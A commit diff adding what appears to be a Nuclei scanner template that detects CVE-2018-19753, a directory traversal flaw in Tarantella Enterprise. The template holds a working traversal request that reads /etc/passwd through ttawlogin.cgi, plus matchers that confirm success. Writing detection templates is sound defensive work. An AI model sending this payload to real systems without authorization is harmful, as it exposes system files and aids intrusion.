commit
79a351b968
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-19753
|
||||
info:
|
||||
name: Tarantella Enterprise Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
|
||||
- https://www.cvedetails.com/cve/CVE-2018-19753
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-19753
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,tarantella,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue